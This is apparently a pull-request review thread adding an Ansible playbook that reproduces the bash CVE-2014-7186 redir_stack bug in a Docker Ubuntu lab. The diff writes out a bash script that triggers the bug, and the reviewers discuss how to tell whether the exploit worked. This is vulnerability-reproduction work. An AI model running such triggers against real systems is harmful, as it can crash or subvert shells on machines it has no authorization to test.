### PR TITLE
CVE-2014-7186

### PR DESCRIPTION
**Pull request by mczimmermann**
pull request for bash redir_stack issue exploit

### CODE REVIEW

File: CVE-2014-7186/cvex.yml [hunk 1]
```diff
@@ -0,0 +1,4 @@
+blueprint: ubuntu2204
+ubuntu:
+  trace: docker
```
[the remark this answers is not in the document]
Comment (mczimmermann) [reply CVE-2014-7186/cvex.yml]: this was leftover from a previous iteration

File: CVE-2014-7186/exploit.yml [hunk 2]
```diff
@@ -0,0 +1,61 @@
...
+      shell: |
+        cat << 'EOF' > /tmp/cve-2014-7186-test.sh
+        #!/bin/bash
+        exec 1<> /dev/null
+        for i in {1..200} ; do
+          printf "=%019d\\n" $i
+        done | bash || echo "CVE-2014-7186 triggered"
+        EOF
+        chmod +x /tmp/cve-2014-7186-test.sh
+        /tmp/cve-2014-7186-test.sh
```
[the remark this answers is not in the document]
Comment (mczimmermann) [reply CVE-2014-7186/exploit.yml]: I think that this creates cve-2014-7186-test.sh as the ansible script executes. I've updated it to be separate now for readability

File: CVE-2014-7186/exploit.yml [hunk 3]
```diff
@@ -0,0 +1,61 @@
...
+
+    - name: Verify Bash version
+      shell: "/usr/local/bin/bash --version"
+      register: bash_version_output
+
+    - name: Display Bash version
+      debug:
+        msg: "{{ bash_version_output.stdout }}"
+
+    - name: Execute CVE-2014-7186 test case
```
[the remark this answers is not in the document]
Comment (mczimmermann) [reply CVE-2014-7186/exploit.yml]: I've updated it based on https://access.redhat.com/articles/1200223 & included the desired breaking output information as a comment in exploit.yml, hopefully this is more clear!

File: CVE-2014-7186/exploit.yml [hunk 4]
```diff
@@ -0,0 +1,60 @@
...
+      debug:
+        msg: "{{ bash_version_output.stdout }}"
+
+    - name: Copy the script to the target
+      copy:
+        src: data/x.sh
+        dest: /tmp/x.sh
+        mode: '0755'
+
+    - name: Execute the script
```
Comment (olegbck) [inline CVE-2014-7186/exploit.yml:51]: Please move execution of the exploit to the "command" parameter of cvex.yml

File: CVE-2014-7186/exploit.yml [hunk 5]
```diff
@@ -0,0 +1,60 @@
...
+      shell: /tmp/x.sh
+      args:
+        executable: /bin/bash 
+      register: exploit_output
+
+    - name: Display exploit result  # if it worked, the time and date information will be output on the screen and a file called /tmp/echo will be created
```
Comment (olegbck) [inline CVE-2014-7186/exploit.yml:57]: It shows me this:

> 2024-11-20 13:46:58,503 - INFO - [ubuntu] TASK [Display exploit result] **************************************************
> 2024-11-20 13:46:58,581 - INFO - [ubuntu] ok: [ubuntu] => {
> 2024-11-20 13:46:58,582 - INFO - [ubuntu]     "msg": "Wed Nov 20 12:46:58 UTC 2024"
> 2024-11-20 13:46:58,582 - INFO - [ubuntu] }

How exactly this is a proof that the exploit is working? It'd be great if you put a comment to x.sh, explaining it.

**Comment by mczimmermann** [comment]
I don't know why, but when I move the bash command into cvex.yml it always throws that error... I think it's because it executes with a slightly different configuration? I can't seem to fix it

**Comment by mczimmermann** [comment]
> I don't know why, but when I move the bash command into cvex.yml it always throws that error... I think it's because it executes with a slightly different configuration? I can't seem to fix it 

@olegbck can you please advise on this? Is it ok to just have it in the exploit.yaml instead

**Comment by olegbck** [comment]
Sorry I merged your PR by mistake. Could you please create another one? It seems that there is a bug in CVEX, working on it.

**Pull request merged**